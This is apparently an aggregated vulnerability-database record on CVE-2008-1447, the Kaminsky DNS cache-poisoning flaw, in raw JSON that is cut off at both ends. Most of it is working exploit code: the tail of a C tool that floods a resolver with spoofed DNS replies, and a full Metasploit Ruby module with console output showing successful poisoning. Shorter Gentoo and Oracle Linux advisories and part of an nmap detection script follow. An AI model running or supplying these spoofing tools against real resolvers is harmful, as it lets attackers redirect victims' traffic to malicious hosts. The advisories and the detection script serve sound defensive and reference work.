\nformat_qr(buf, size, len, name, type, class); \n// ttl \nttl = htonl(ttl); \nmemcpy(buf + *len, &ttl, sizeof (ttl)); \n*len += sizeof (ttl); \n// data length + data \nuint16_t dlen; \nstruct addr addr; \nswitch (type) \n{ \ncase TYPE_A: \ndlen = sizeof (addr.addr_ip); \nbreak; \ncase TYPE_NS: \ndlen = strlen(data) + 1; \nbreak; \ndefault: \nfprintf(stderr, \"format_rr: unknown type %02x\", type); \nexit(1); \n} \ndlen = htons(dlen); \nmemcpy(buf + *len, &dlen, sizeof (dlen)); \n*len += sizeof (dlen); \n// data \nunsigned len2; \nswitch (type) \n{ \ncase TYPE_A: \nif (addr_aton(data, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: %s\", data), exit(1); \nmemcpy(buf + *len, &addr.addr_ip, sizeof (addr.addr_ip)); \n*len += sizeof (addr.addr_ip); \nbreak; \ncase TYPE_NS: \nformat_domain(buf + *len, size - *len, &len2, data); \n*len += len2; \nbreak; \ndefault: \nfprintf(stderr, \"format_rr: unknown type %02x\", type); \nexit(1); \n} \n} \n \nvoid dns_query(u_char *buf, unsigned size, unsigned *len, uint16_t txid, uint16_t flags, const char *name) \n{ \nu_char *out = buf; \nstruct dns_pkt p = { \n.txid = htons(txid), \n.flags = htons(flags), \n.nr_quest = htons(1), \n.nr_ans = htons(0), \n.nr_auth = htons(0), \n.nr_add = htons(0), \n}; \nu_char qr[256]; \nunsigned l; \nformat_qr(qr, sizeof (qr), &l, name, TYPE_A, CLASS_IN); \nif (sizeof (p) + l > size) \nfprintf(stderr, \"dns_query overflow\"), exit(1); \nmemcpy(out, &p, sizeof (p)); \nout += sizeof (p); \nmemcpy(out, qr, l); \nout += l; \n*len = sizeof (p) + l; \n} \n \nvoid dns_response(u_char *buf, unsigned size, unsigned *len, \nuint16_t txid, uint16_t flags, \nconst char *q_name, const char *q_ip, \nconst char *domain, const char *auth_name, const char *auth_ip) \n{ \nu_char *out = buf; \nu_char *end = buf + size; \nu_char rec[256]; \nunsigned l_rec; \nuint32_t ttl = 24*3600; \nstruct dns_pkt p = { \n.txid = htons(txid), \n.flags = htons(flags), \n.nr_quest = htons(1), \n.nr_ans = htons(1), \n.nr_auth = htons(1), \n.nr_add = htons(1), \n}; \n(void)domain; \n*len = 0; \nif (out + *len + sizeof (p) > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, &p, sizeof (p)); *len += sizeof (p); \n// queries \nformat_qr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n// answers \nformat_rr(rec, sizeof (rec), &l_rec, q_name, TYPE_A, CLASS_IN, \nttl, q_ip); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n// authoritative nameservers \nformat_rr(rec, sizeof (rec), &l_rec, domain, TYPE_NS, CLASS_IN, \nttl, auth_name); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n// additional records \nformat_rr(rec, sizeof (rec), &l_rec, auth_name, TYPE_A, CLASS_IN, \nttl, auth_ip); \nif (out + *len + l_rec > end) \nfprintf(stderr, \"dns_response overflow\"), exit(1); \nmemcpy(out + *len, rec, l_rec); *len += l_rec; \n} \n \nunsigned build_query(u_char *buf, const char *srcip, const char *dstip, const char *name) \n{ \nunsigned len = 0; \n// ip \nstruct ip_hdr *ip = (struct ip_hdr *)buf; \nip->ip_hl = 5; \nip->ip_v = 4; \nip->ip_tos = 0; \nip->ip_id = rand() & 0xffff; \nip->ip_off = 0; \nip->ip_ttl = IP_TTL_MAX; \nip->ip_p = 17; // udp \nip->ip_sum = 0; \nstruct addr addr; \nif (addr_aton(srcip, &addr) < 0) \nfprintf(stderr, \"invalid source IP: %s\", srcip), exit(1); \nip->ip_src = addr.addr_ip; \nif (addr_aton(dstip, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1); \nip->ip_dst = addr.addr_ip; \n// udp \nstruct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); \nudp->uh_sport = htons(1234); \nudp->uh_dport = htons(53); \n// dns \ndns_query(buf + IP_HDR_LEN + UDP_HDR_LEN, \n(unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, \nrand(), DNSF_REC_DESIRED, name); \n// udp len \nlen += UDP_HDR_LEN; \nudp->uh_ulen = htons(len); \n// ip len & cksum \nlen += IP_HDR_LEN; \nip->ip_len = htons(len); \nip_checksum(buf, len); \nreturn len; \n} \n \nunsigned build_response(u_char *buf, const char *srcip, const char *dstip, \nuint16_t port_resolver, uint16_t txid, \nconst char *q_name, const char *q_ip, \nconst char *domain, const char *auth_name, const char *auth_ip) \n{ \nunsigned len = 0; \n// ip \nstruct ip_hdr *ip = (struct ip_hdr *)buf; \nip->ip_hl = 5; \nip->ip_v = 4; \nip->ip_tos = 0; \nip->ip_id = rand() & 0xffff; \nip->ip_off = 0; \nip->ip_ttl = IP_TTL_MAX; \nip->ip_p = 17; // udp \nip->ip_sum = 0; \nstruct addr addr; \nif (addr_aton(srcip, &addr) < 0) \nfprintf(stderr, \"invalid source IP: %s\", srcip), exit(1); \nip->ip_src = addr.addr_ip; \nif (addr_aton(dstip, &addr) < 0) \nfprintf(stderr, \"invalid destination IP: %s\", dstip), exit(1); \nip->ip_dst = addr.addr_ip; \n// udp \nstruct udp_hdr *udp = (struct udp_hdr *)(buf + IP_HDR_LEN); \nudp->uh_sport = htons(53); \nudp->uh_dport = htons(port_resolver); \n// dns \ndns_response(buf + IP_HDR_LEN + UDP_HDR_LEN, \n(unsigned)(sizeof (buf) - (IP_HDR_LEN + UDP_HDR_LEN)), &len, \ntxid, DNSF_RESPONSE | DNSF_AUTHORITATIVE, \nq_name, q_ip, domain, auth_name, auth_ip); \n// udp len \nlen += UDP_HDR_LEN; \nudp->uh_ulen = htons(len); \n// ip len & cksum \nlen += IP_HDR_LEN; \nip->ip_len = htons(len); \nip_checksum(buf, len); \nreturn len; \n} \n \nvoid usage(char *name) \n{ \nfprintf(stderr, \"Usage: %s <ip-querier> <ip-resolver> <ip-authoritative> \" \n\"<port-resolver> <subhost> <domain> <any-ip> <attempts> <repl-per-attempt>\\n\" \n\" <ip-querier> Source IP used when sending queries for random hostnames\\n\" \n\" (typically your IP)\\n\" \n\" <ip-resolver> Target DNS resolver to attack\\n\" \n\" <ip-authoritative> One of the authoritative DNS servers for <domain>\\n\" \n\" <port-resolver> Source port used by the resolver when forwarding queries\\n\" \n\" <subhost> Poison the cache with the A record <subhost>.<domain>\\n\" \n\" <domain> Domain name, see <subhost>.\\n\" \n\" <any-ip> IP of your choice to be associated to <subhost>.<domain>\\n\" \n\" <attempts> Number of poisoning attemps, more attempts increase the\\n\" \n\" chance of successful poisoning, but also the attack time\\n\" \n\" <repl-per-attempt> Number of spoofed replies to send per attempt, more replies\\n\" \n\" increase the chance of successful poisoning but, but also\\n\" \n\" the rate of packet loss\\n\" \n\"Example:\\n\" \n\" $ %s q.q.q.q r.r.r.r a.a.a.a 1234 pwned example.com. 1.1.1.1 8192 16\\n\" \n\"This should cause a pwned.example.com A record resolving to 1.1.1.1 to appear\\n\" \n\"in r.r.r.r's cache. The chance of successfully poisoning the resolver with\\n\" \n\"this example (8192 attempts and 16 replies/attempt) is 86%%\\n\" \n\"(1-(1-16/65536)**8192). This example also requires a bandwidth of about\\n\" \n\"2.6 Mbit/s (16 replies/attempt * ~200 bytes/reply * 100 attempts/sec *\\n\" \n\"8 bits/byte) and takes about 80 secs to complete (8192 attempts /\\n\" \n\"100 attempts/sec).\\n\", \nname, name); \n} \n \nint main(int argc, char **argv) \n{ \nif (argc != 10) \nusage(argv[0]), exit(1); \nconst char *querier = argv[1]; \nconst char *ip_resolver = argv[2]; \nconst char *ip_authoritative = argv[3]; \nuint16_t port_resolver = (uint16_t)strtoul(argv[4], NULL, 0); \nconst char *subhost = argv[5]; \nconst char *domain = argv[6]; \nconst char *anyip = argv[7]; \nuint16_t attempts = (uint16_t)strtoul(argv[8], NULL, 0); \nuint16_t replies = (uint16_t)strtoul(argv[9], NULL, 0); \nif (domain[strlen(domain) - 1 ] != '.') \nfprintf(stderr, \"domain must end with dot(.): %s\\n\", domain), exit(1); \nprintf(\"Chance of success: 1-(1-%d/65536)**%d = %.2f\\n\", replies, attempts, 1 - pow((1 - replies / 65536.), attempts)); \nsrand(time(NULL)); \nint unique = rand() + (rand() << 16); \nu_char buf[IP_LEN_MAX]; \nunsigned len; \nchar name[256]; \nchar ns[256]; \nip_t *iph; \nif ((iph = ip_open()) == NULL) \nerr(1, \"ip_open\"); \nint cnt = 0; \nwhile (cnt < attempts) \n{ \n// send a query for a random hostname \nsnprintf(name, sizeof (name), \"%08x%08x.%s\", unique, cnt, domain); \nlen = build_query(buf, querier, ip_resolver, name); \nif (ip_send(iph, buf, len) != len) \nerr(1, \"ip_send\"); \n// give the resolver enough time to forward the query and be in a state \n// where it waits for answers; sleeping 10ms here limits the number of \n// attempts to 100 per sec \nusleep(10000); \n// send spoofed replies, each reply contains: \n// - 1 query: query for the \"random hostname\" \n// - 1 answer: \"random hostname\" A 1.1.1.1 \n// - 1 authoritative nameserver: <domain> NS <subhost>.<domain> \n// - 1 additional record: <subhost>.<domain> A <any-ip> \nsnprintf(ns, sizeof (ns), \"%s.%s\", subhost, domain); \nunsigned r; \nfor (r = 0; r < replies; r++) \n{ \n// use a txid that is just 'r': 0..(replies-1) \nlen = build_response(buf, ip_authoritative, ip_resolver, \nport_resolver, r, name, \"1.1.1.1\", domain, ns, anyip); \nif (ip_send(iph, buf, len) != len) \nerr(1, \"ip_send\"); \n} \ncnt++; \n} \nip_close(iph); \nreturn 0; \n} \n \n \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68500/bind9x-poison.txt"}, {"lastseen": "2016-12-05T22:20:49", "description": "", "published": "2008-07-24T00:00:00", "type": "packetstorm", "title": "bailiwicked_host.rb.txt", "bulletinFamily": "exploit", "cvelist": ["CVE-2008-1447"], "modified": "2008-07-24T00:00:00", "id": "PACKETSTORM:68471", "href": "https://packetstormsecurity.com/files/68471/bailiwicked_host.rb.txt.html", "sourceData": "` ____ ____ __ __ \n/ \\ / \\ | | | | \n----====####/ /\\__\\##/ /\\ \\##| |##| |####====---- \n| | | |__| | | | | | \n| | ___ | __ | | | | | \n------======######\\ \\/ /#| |##| |#| |##| |######======------ \n\\____/ |__| |__| \\______/ \n \nComputer Academic Underground \nhttp://www.caughq.org \nExploit Code \n \n===============/======================================================== \nExploit ID: CAU-EX-2008-0002 \nRelease Date: 2008.07.23 \nTitle: bailiwicked_host.rb \nDescription: Kaminsky DNS Cache Poisoning Flaw Exploit \nTested: BIND 9.4.1-9.4.2 \nAttributes: Remote, Poison, Resolver, Metasploit \nExploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt \nAuthor/Email: I)ruid <druid (@) caughq.org> \nH D Moore <hdm (@) metasploit.com> \n===============/======================================================== \n \nDescription \n=========== \n \nThis exploit targets a fairly ubiquitous flaw in DNS implementations \nwhich allow the insertion of malicious DNS records into the cache of the \ntarget nameserver. This exploit caches a single malicious host entry \ninto the target nameserver. By causing the target nameserver to query \nfor random hostnames at the target domain, the attacker can spoof a \nresponse to the target server including an answer for the query, an \nauthority server record, and an additional record for that server, \ncausing target nameserver to insert the additional record into the \ncache. \n \n \nExample \n======= \n \n# /msf3/msfconsole \n \n_ _ _ _ \n| | | | (_) | \n_ __ ___ ___| |_ __ _ ___ _ __ | | ___ _| |_ \n| '_ ` _ \\ / _ \\ __/ _` / __| '_ \\| |/ _ \\| | __| \n| | | | | | __/ || (_| \\__ \\ |_) | | (_) | | |_ \n|_| |_| |_|\\___|\\__\\__,_|___/ .__/|_|\\___/|_|\\__| \n| | \n|_| \n \n \n=[ msf v3.2-release \n+ -- --=[ 298 exploits - 124 payloads \n+ -- --=[ 18 encoders - 6 nops \n=[ 72 aux \n \nmsf > use auxiliary/spoof/dns/bailiwicked_host \nmsf auxiliary(bailiwicked_host) > show options \n \nModule options: \n \nName Current Setting Required Description \n---- --------------- -------- ----------- \nHOSTNAME pwned.example.com yes Hostname to hijack \nNEWADDR 1.3.3.7 yes New address for hostname \nRECONS 208.67.222.222 yes Nameserver used for reconnaissance \nRHOST yes The target address \nSRCPORT yes The target server's source query port (0 for automatic) \nXIDS 10 yes Number of XIDs to try for each query \n \nmsf auxiliary(bailiwicked_host) > set RHOST A.B.C.D \nRHOST => A.B.C.D \n \nmsf auxiliary(bailiwicked_host) > check \n[*] Using the Metasploit service to verify exploitability... \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] >> ADDRESS: A.B.C.D PORT: 48178 \n[*] FAIL: This server uses static source ports and is vulnerable to poisoning \n \nmsf auxiliary(bailiwicked_host) > set SRCPORT 0 \nSRCPORT => 0 \n \nmsf auxiliary(bailiwicked_host) > run \n[*] Switching to target port 48178 based on Metasploit service \n[*] Targeting nameserver A.B.C.D \n[*] Querying recon nameserver for example.com.'s nameservers... \n[*] Got answer with 2 answers, 0 authorities \n[*] Got an NS record: example.com. 172643 IN NS ns89.worldnic.com. \n[*] Querying recon nameserver for address of ns89.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns89.worldnic.com. 172794 IN A 205.178.190.45 \n[*] Checking Authoritativeness: Querying 205.178.190.45 for example.com.... \n[*] ns89.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Got an NS record: example.com. 172643 IN NS ns90.worldnic.com. \n[*] Querying recon nameserver for address of ns90.worldnic.com.... \n[*] Got answer with 1 answers, 0 authorities \n[*] Got an A record: ns90.worldnic.com. 172794 IN A 205.178.144.45 \n[*] Checking Authoritativeness: Querying 205.178.144.45 for example.com.... \n[*] ns90.worldnic.com. is authoritative for example.com., adding to list of nameservers to spoof as \n[*] Attempting to inject a poison record for pwned.example.com. into A.B.C.D:48178... \n[*] Sent 1000 queries and 20000 spoofed responses... \n[*] Sent 2000 queries and 40000 spoofed responses... \n[*] Sent 3000 queries and 60000 spoofed responses... \n[*] Sent 4000 queries and 80000 spoofed responses... \n[*] Sent 5000 queries and 100000 spoofed responses... \n[*] Sent 6000 queries and 120000 spoofed responses... \n[*] Sent 7000 queries and 140000 spoofed responses... \n[*] Poisoning successful after 7000 attempts: pwned.example.com == 1.3.3.7 \n[*] Auxiliary module execution completed \nmsf auxiliary(bailiwicked_host) > \n \nmsf auxiliary(bailiwicked_host) > nslookup pwned.example.com A.B.C.D \n[*] exec: nslookup pwned.example.com A.B.C.D \n \nServer: A.B.C.D \nAddress: A.B.C.D#53 \n \nNon-authoritative answer: \nName: pwned.example.com \nAddress: 1.3.3.7 \n \n \nCredits \n======= \n \nDan Kaminsky is credited with originally discovering this vulnerability. \n \n \nReferences \n========== \n \nhttp://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447 \nhttp://www.kb.cert.org/vuls/id/800113 \n \n \nMetasploit \n========== \n \nrequire 'msf/core' \nrequire 'net/dns' \nrequire 'scruby' \nrequire 'resolv' \n \nmodule Msf \n \nclass Auxiliary::Spoof::Dns::BailiWickedHost < Msf::Auxiliary \n \ninclude Exploit::Remote::Ip \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'DNS BailiWicked Host Attack', \n'Description' => %q{ \nThis exploit attacks a fairly ubiquitous flaw in DNS implementations which \nDan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single \nmalicious host entry into the target nameserver by sending random sub-domain \nqueries to the target DNS server coupled with spoofed replies to those \nqueries from the authoritative nameservers for the domain which contain a \nmalicious host entry for the hostname to be poisoned in the authority and \nadditional records sections. Eventually, a guessed ID will match and the \nspoofed packet will get accepted, and due to the additional hostname entry \nbeing within bailiwick constraints of the original request the malicious host \nentry will get cached. \n}, \n'Author' => [ 'I)ruid', 'hdm' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 5585 $', \n'References' => \n[ \n[ 'CVE', '2008-1447' ], \n[ 'US-CERT-VU', '8000113' ], \n[ 'URL', 'http://www.caughq.org/exploits/CAU-EX-2008-0002.txt' ], \n], \n'Privileged' => true, \n'Targets' => \n[ \n[\"BIND\", \n{ \n'Arch' => ARCH_X86, \n'Platform' => 'linux', \n}, \n], \n], \n'DisclosureDate' => 'Jul 21 2008' \n)) \n \nregister_options( \n[ \nOptPort.new('SRCPORT', [true, \"The target server's source query port (0 for automatic)\", nil]), \nOptString.new('HOSTNAME', [true, 'Hostname to hijack', 'pwned.example.com']), \nOptAddress.new('NEWADDR', [true, 'New address for hostname', '1.3.3.7']), \nOptAddress.new('RECONS', [true, 'Nameserver used for reconnaissance', '208.67.222.222']), \nOptInt.new('XIDS', [true, 'Number of XIDs to try for each query', 10]), \nOptInt.new('TTL', [true, 'TTL for the malicious host entry', 31337]), \n], self.class) \n \nend \n \ndef auxiliary_commands \nreturn { \"check\" => \"Determine if the specified DNS server (RHOST) is vulnerable\" } \nend \n \ndef cmd_check(*args) \ntarg = args[0] || rhost() \nif(not (targ and targ.length > 0)) \nprint_status(\"usage: check [dns-server]\") \nreturn \nend \n \nprint_status(\"Using the Metasploit service to verify exploitability...\") \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => targ, \n'PeerPort' => 53 \n) \n \nrandom = false \nports = [] \nlport = nil \n \n1.upto(5) do |i| \n \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-check-#{i}-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \n \nprint_status(\" >> ADDRESS: #{t_addr} PORT: #{t_port}\") \nt_port = t_port.to_i \nif(lport and lport != t_port) \nrandom = true \nend \nlport = t_port \nports << t_port \nend \nend \nend \nend \n \nsrv_sock.close \n \nif(ports.length < 5) \nprint_status(\"UNKNOWN: This server did not reply to our vulnerability check requests\") \nreturn \nend \n \nif(random) \nprint_status(\"PASS: This server does not use a static source port. Ports: #{ports.join(\", \")}\") \nprint_status(\" This server may still be exploitable, but not by this tool.\") \nelse \nprint_status(\"FAIL: This server uses static source ports and is vulnerable to poisoning\") \nend \nend \n \ndef run \ntarget = rhost() \nsource = Rex::Socket.source_address(target) \nsport = datastore['SRCPORT'] \nhostname = datastore['HOSTNAME'] + '.' \naddress = datastore['NEWADDR'] \nrecons = datastore['RECONS'] \nxids = datastore['XIDS'].to_i \nttl = datastore['TTL'].to_i \nxidbase = rand(4)+2*10000 \n \ndomain = hostname.match(/[^\\x2e]+\\x2e[^\\x2e]+\\x2e$/)[0] \n \nsrv_sock = Rex::Socket.create_udp( \n'PeerHost' => target, \n'PeerPort' => 53 \n) \n \n# Get the source port via the metasploit service if it's not set \nif sport.to_i == 0 \nreq = Resolv::DNS::Message.new \ntxt = \"spoofprobe-#{$$}#{(rand()*1000000).to_i}.red.metasploit.com\" \nreq.add_question(txt, Resolv::DNS::Resource::IN::TXT) \nreq.rd = 1 \n \nsrv_sock.put(req.encode) \nres, addr = srv_sock.recvfrom() \n \nif res and res.length > 0 \nres = Resolv::DNS::Message.decode(res) \nres.each_answer do |name, ttl, data| \nif (name.to_s == txt and data.strings.join('') =~ /^([^\\s]+)\\s+.*red\\.metasploit\\.com/m) \nt_addr, t_port = $1.split(':') \nsport = t_port.to_i \n \nprint_status(\"Switching to target port #{sport} based on Metasploit service\") \nif target != t_addr \nprint_status(\"Warning: target address #{target} is not the same as the nameserver's query source address #{t_addr}!\") \nend \nend \nend \nend \nend \n \n# Verify its not already cached \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nbegin \ncached = false \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nt = Time.now + ttl \nprint_status(\"Failure: This hostname is already in the target cache: #{name} == #{address}\") \nprint_status(\" Cache entry expires on #{t.to_s}... sleeping.\") \ncached = true \nsleep ttl \nend \nend \nend \nend until not cached \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error checking the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \n \nres0 = Net::DNS::Resolver.new(:nameservers => [recons], :dns_search => false, :recursive => true) # reconnaissance resolver \n \nprint_status \"Targeting nameserver #{target} for injection of #{hostname} as #{address}\" \n \n# Look up the nameservers for the domain \nprint_status \"Querying recon nameserver for #{domain}'s nameservers...\" \nanswer0 = res0.send(domain, Net::DNS::NS) \n#print_status \" Got answer with #{answer0.header.anCount} answers, #{answer0.header.nsCount} authorities\" \n \nbarbs = [] # storage for nameservers \nanswer0.answer.each do |rr0| \nprint_status \" Got an #{rr0.type} record: #{rr0.inspect}\" \nif rr0.type == 'NS' \nprint_status \" Querying recon nameserver for address of #{rr0.nsdname}...\" \nanswer1 = res0.send(rr0.nsdname) # get the ns's answer for the hostname \n#print_status \" Got answer with #{answer1.header.anCount} answers, #{answer1.header.nsCount} authorities\" \nanswer1.answer.each do |rr1| \nprint_status \" Got an #{rr1.type} record: #{rr1.inspect}\" \nres2 = Net::DNS::Resolver.new(:nameservers => rr1.address, :dns_search => false, :recursive => false, :retry => 1) \nprint_status \" Checking Authoritativeness: Querying #{rr1.address} for #{domain}...\" \nanswer2 = res2.send(domain) \nif answer2 and answer2.header.auth? and answer2.header.anCount >= 1 \nnsrec = {:name => rr0.nsdname, :addr => rr1.address} \nbarbs << nsrec \nprint_status \" #{rr0.nsdname} is authoritative for #{domain}, adding to list of nameservers to spoof as\" \nend \nend \nend \nend \n \nif barbs.length == 0 \nprint_status( \"No DNS servers found.\") \nsrv_sock.close \ndisconnect_ip \nreturn \nend \n \n# Flood the target with queries and spoofed responses, one will eventually hit \nqueries = 0 \nresponses = 0 \n \nconnect_ip if not ip_sock \n \nprint_status( \"Attempting to inject a poison record for #{hostname} into #{target}:#{sport}...\") \n \nwhile true \nrandhost = Rex::Text.rand_text_alphanumeric(12) + '.' + domain # randomize the hostname \n \n# Send spoofed query \nreq = Resolv::DNS::Message.new \nreq.id = rand(2**16) \nreq.add_question(randhost, Resolv::DNS::Resource::IN::A) \n \nreq.rd = 1 \n \nbuff = ( \nScruby::IP.new( \n#:src => barbs[0][:addr].to_s, \n:src => source, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => (rand((2**16)-1024)+1024).to_i, \n:dport => 53 \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nqueries += 1 \n \n# Send evil spoofed answer from ALL nameservers (barbs[*][:addr]) \nreq.add_answer(randhost, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.add_authority(domain, ttl, Resolv::DNS::Resource::IN::NS.new(Resolv::DNS::Name.create(hostname))) \nreq.add_additional(hostname, ttl, Resolv::DNS::Resource::IN::A.new(address)) \nreq.qr = 1 \nreq.ra = 1 \n \nxidbase.upto(xidbase+xids-1) do |id| \nreq.id = id \nbarbs.each do |barb| \nbuff = ( \nScruby::IP.new( \n#:src => barbs[i][:addr].to_s, \n:src => barb[:addr].to_s, \n:dst => target, \n:proto => 17 \n)/Scruby::UDP.new( \n:sport => 53, \n:dport => sport.to_i \n)/req.encode \n).to_net \nip_sock.sendto(buff, target) \nresponses += 1 \nend \nend \n \n# status update \nif queries % 1000 == 0 \nprint_status(\"Sent #{queries} queries and #{responses} spoofed responses...\") \nend \n \n# every so often, check and see if the target is poisoned... \nif queries % 250 == 0 \nbegin \nquery = Resolv::DNS::Message.new \nquery.add_question(hostname, Resolv::DNS::Resource::IN::A) \nquery.rd = 0 \n \nsrv_sock.put(query.encode) \nanswer, addr = srv_sock.recvfrom() \n \nif answer and answer.length > 0 \nanswer = Resolv::DNS::Message.decode(answer) \nanswer.each_answer do |name, ttl, data| \nif((name.to_s + \".\") == hostname and data.address.to_s == address) \nprint_status(\"Poisoning successful after #{queries} attempts: #{name} == #{address}\") \ndisconnect_ip \nreturn \nend \nend \nend \nrescue ::Interrupt \nraise $! \nrescue ::Exception => e \nprint_status(\"Error querying the DNS name: #{e.class} #{e} #{e.backtrace}\") \nend \nend \n \nend \n \nend \n \nend \nend \n \n \n-- \nI)ruid, C\u00b2ISSP \ndruid@caughq.org \nhttp://druid.caughq.org \n`\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/68471/bailiwicked_host.rb.txt"}], "gentoo": [{"lastseen": "2016-09-06T19:46:51", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "### Background\n\nISC BIND is the Internet Systems Consortium implementation of the Domain Name System (DNS) protocol. \n\n### Description\n\nDan Kaminsky of IOActive has reported a weakness in the DNS protocol related to insufficient randomness of DNS transaction IDs and query source ports. \n\n### Impact\n\nAn attacker could exploit this weakness to poison the cache of a recursive resolver and thus spoof DNS traffic, which could e.g. lead to the redirection of web or mail traffic to malicious sites. \n\n### Workaround\n\nThere is no known workaround at this time. \n\n### Resolution\n\nAll BIND users should upgrade to the latest version: \n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-dns/bind-9.4.2_p1\"\n\nNote: In order to utilize the query port randomization to mitigate the weakness, you need to make sure that your network setup allows the DNS server to use random source ports for query and that you have not set a fixed query port via the \"query-source port\" directive in the BIND configuration.", "edition": 1, "modified": "2008-07-11T00:00:00", "published": "2008-07-11T00:00:00", "id": "GLSA-200807-08", "href": "https://security.gentoo.org/glsa/200807-08", "type": "gentoo", "title": "BIND: Cache poisoning", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:36:22", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "bind: \n[9.3.4-6.0.1.P1]\n- CVE-2008-1447\nselinux-policy:\n[2.4.6-137.1]\n- Allow named to bind to any udp port\nResolves: #451971", "edition": 4, "modified": "2008-07-08T00:00:00", "published": "2008-07-08T00:00:00", "id": "ELSA-2008-0533", "href": "http://linux.oracle.com/errata/ELSA-2008-0533.html", "title": "bind security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:31", "bulletinFamily": "unix", "cvelist": ["CVE-2008-1447"], "description": "[2.45-1.el5.1]\n- update to new upstream version\n- fixes for CVE-2008-1447/CERT VU#800113\n- Resolves: rhbz#454869", "edition": 4, "modified": "2008-08-11T00:00:00", "published": "2008-08-11T00:00:00", "id": "ELSA-2008-0789", "href": "http://linux.oracle.com/errata/ELSA-2008-0789.html", "title": "dnsmasq security update", "type": "oraclelinux", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}], "nmap": [{"lastseen": "2019-05-30T17:05:55", "description": "Checks a DNS server for the predictable-port recursion vulnerability. Predictable source ports can make a DNS server vulnerable to cache poisoning attacks (see CVE-2008-1447). \n\nThe script works by querying porttest.dns-oarc.net (see https://www.dns-oarc.net/oarc/services/porttest). Be aware that any targets against which this script is run will be sent to and potentially recorded by one or more DNS servers and the porttest server. In addition your IP address will be sent along with the porttest query to the DNS server running on the target.\n\n## Example Usage \n \n \n nmap -sU -p 53 --script=dns-random-srcport <target>\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 53/udp open domain udp-response\n |_dns-random-srcport: X.X.X.X is GREAT: 26 queries in 1.2 seconds from 26 ports with std dev 17905\n\n## Requires \n\n * comm\n * nmap\n * shortport\n * string\n * stdnse\n\n* * *\n", "edition": 7, "published": "2008-11-06T02:52:59", "title": "dns-random-srcport NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-1447"], "modified": "2018-08-28T15:56:45", "id": "NMAP:DNS-RANDOM-SRCPORT.NSE", "href": "https://nmap.org/nsedoc/scripts/dns-random-srcport.html", "sourceData": "local comm = require \"comm\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\nlocal stdnse = require \"stdnse\"\n\ndescription = [[\nChecks a DNS server for the predictable-port recursion vulnerability.\nPredictable source ports can make a DNS server vulnerable to cache poisoning\nattacks (see CVE-2008-1447).\n\nThe script works by querying porttest.dns-oarc.net (see\nhttps://www.dns-oarc.net/oarc/services/porttest). Be aware that any\ntargets against which this script is run will be sent to and\npotentially recorded by one or more DNS servers and the porttest\nserver. In addition your IP address will be sent along with the\nporttest query to the DNS server running on the target.\n]]\n\nlicense = \"Same as Nmap--See 